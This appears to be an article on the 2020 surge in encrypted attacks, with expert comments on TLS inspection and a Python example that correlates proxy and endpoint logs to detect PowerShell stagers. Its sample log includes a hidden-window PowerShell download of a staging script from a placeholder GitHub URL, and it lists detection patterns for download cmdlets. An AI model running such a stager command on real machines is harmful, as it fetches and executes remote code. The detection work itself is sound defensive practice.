New research by Zscaler, analysing 6.6 billion security threats, found a 260% increase in attacks during the first nine months of 2020. Among the encrypted attacks, ransomware rose by 500%, with the most prominent variants being FileCrypt/FileCoder, followed by Sodinokibi, Maze and Ryuk.
For most organisations, particularly SMEs with little to no resources or knowledge dedicated to cybersecurity, determining the safety of a site comes down to whether or not it has a padlock symbol in the address bar. Unfortunately, while a tool such as this is primarily employed to ensure privacy and data integrity, it can also be manipulated for nefarious uses. Indeed, it’s a clever trick, as malicious acts are masked behind a symbol universally recognised to mean ‘secure’ and ‘safe’. Organisations would benefit from deploying security defences that analyse the legitimacy of connections.
I agree that using security controls such as SSL certs to secure communications and links could support masking the threat and attack vector, and this is why in-depth control frameworks are so important; other security controls and alerts would highlight this as malicious activity for investigation. An identity and access management platform that assesses risk from both an authentication and authorization perspective would support identifying these malicious attack attempts, as risk factors would change and reduce the associated risks.
For any cybersecurity team to be successful, they must have security monitoring, alerting technologies and tooling throughout their organisation’s architecture so they can identify a threat and respond accordingly to reduce business impacts and consequences, up to and including preventing a data breach. In a cybersecurity protection role, this can also include the ability to monitor encrypted communication channels.
There are no privacy implications here; the definition of privacy is the permitted access to data to carry out the business requirements, and in this case access is granted to review communication channels and identify the cybersecurity threat contained within the encrypted channel. That being said, if the security team has been involved in the design and architecture of the network/communication channels using encryption, they will be implemented in a way that allows the team to identify authentication communications to unauthorized users, along with the ability to monitor a specific communication should they need to.
Having more visibility into the SSL/TLS traffic definitely is one of the key elements needed to detect modern attacks. However, SSL/TLS inspection/termination alone is often not sufficient. To illustrate, even with SSL/TLS inspection in place, malicious threat actors (MTA) often implement additional layers of encryption and obfuscation on top of SSL/TLS and are also often leveraging legitimate sites, such as githubusercontent, cloud drives, and others, to “reflect”/host malicious stager payloads. One example is Trickbot/Powertrick MTA, where we’ve been seeing attackers download post-attack PowerShell stagers from SSL/TLS sites. For this reason, in addition to SSL/TLS inspection and termination, it’s important to be able to monitor SSL/TLS activity in context of some of the other activity that happens in your environment from a variety of log/data sources and be able to correlate behaviours across different log/data sources effectively, especially when it comes to cloud collaboration apps.
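The correlation the last comment argues for, as an added illustration that is not part of the article or any of the quoted experts' material: a TLS-inspection (proxy) log on its own shows only that a workstation reached a legitimate hosting domain, and an endpoint log on its own shows only that a scripting host started, yet the two events on the same machine within a short window are worth an analyst's attention. The log lines, field names (`src_host`, `sni`, `image`, `cmdline`), the hosting-domain watchlist and the time window are all constructed assumptions for the example, not formats from any particular product.

```python
"""Correlate TLS-inspection proxy events with endpoint process-creation events.

Neither log is suspicious alone: developers fetch from GitHub all day and
administrators run PowerShell all day. The detection is the conjunction:
a scripting host on the same workstation, within a short window of a TLS
connection to a file-hosting domain, with a download cmdlet on its command line.
"""
import re
from datetime import datetime, timedelta

# Constructed sample TLS-inspection log (key=value style); not real traffic.
PROXY_LOG = """\
ts=2020-11-02T09:14:03Z src_host=WS-0417 sni=raw.githubusercontent.com bytes_in=48211 action=allowed
ts=2020-11-02T09:14:40Z src_host=WS-0417 sni=login.microsoftonline.com bytes_in=3120 action=allowed
ts=2020-11-02T10:02:11Z src_host=WS-0088 sni=raw.githubusercontent.com bytes_in=9123 action=allowed
ts=2020-11-02T11:30:00Z src_host=WS-0203 sni=raw.githubusercontent.com bytes_in=50123 action=allowed
"""

# Constructed sample endpoint process-creation log from the same workstations.
# The URL path is a placeholder, not a real repository.
ENDPOINT_LOG = """\
ts=2020-11-02T09:14:05Z host=WS-0417 image=powershell.exe cmdline="powershell.exe -NoProfile -w hidden -c Invoke-WebRequest https://raw.githubusercontent.com/EXAMPLE-PLACEHOLDER/stage.ps1"
ts=2020-11-02T09:15:10Z host=WS-0417 image=outlook.exe cmdline="outlook.exe"
ts=2020-11-02T10:02:30Z host=WS-0088 image=git.exe cmdline="git.exe pull"
ts=2020-11-02T11:45:00Z host=WS-0203 image=powershell.exe cmdline="powershell.exe -c Get-ChildItem"
"""

# Assumed watchlist: legitimate hosting/collaboration domains commonly abused
# to stage content (tune to your environment).
HOSTING_WATCHLIST = {"raw.githubusercontent.com", "drive.google.com", "onedrive.live.com"}
# Scripting hosts whose network-fetching command lines deserve context.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Real PowerShell/.NET download primitives that a stager command line tends to contain.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_log(text):
    """Parse key=value lines (values may be double-quoted) into dicts; 'ts' becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = {}
        for key, val in KV_RE.findall(line):
            if len(val) >= 2 and val[0] == '"' and val[-1] == '"':
                val = val[1:-1]
            ev[key] = val
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def correlate(proxy_events, endpoint_events, window=timedelta(minutes=5)):
    """Return findings where a watchlisted TLS connection and a scripting-host
    download command occur on the same workstation within `window`."""
    findings = []
    for px in proxy_events:
        sni = px.get("sni", "")
        if sni not in HOSTING_WATCHLIST:
            continue
        for ep in endpoint_events:
            if ep.get("host") != px.get("src_host"):
                continue
            if ep.get("image", "").lower() not in SCRIPT_HOSTS:
                continue
            if abs(ep["ts"] - px["ts"]) > window:
                continue
            cmd = ep.get("cmdline", "")
            # Either a download primitive or the same domain on the command line ties the events together.
            if DOWNLOAD_RE.search(cmd) or sni in cmd:
                findings.append({
                    "host": ep["host"],
                    "sni": sni,
                    "proxy_ts": px["ts"].isoformat(),
                    "process_ts": ep["ts"].isoformat(),
                    "cmdline": cmd,
                })
    return findings


if __name__ == "__main__":
    for f in correlate(parse_log(PROXY_LOG), parse_log(ENDPOINT_LOG)):
        print(f"[{f['proxy_ts']}] {f['host']} -> {f['sni']} followed by: {f['cmdline']}")
```

On the constructed data only WS-0417 is flagged: WS-0088 reached the same domain but the process was `git.exe`, and WS-0203 ran PowerShell without a download primitive and outside the window. In a real deployment the join keys would come from your proxy's client identifier and the EDR's hostname field, and the window would be tuned to the clock skew between the two sources.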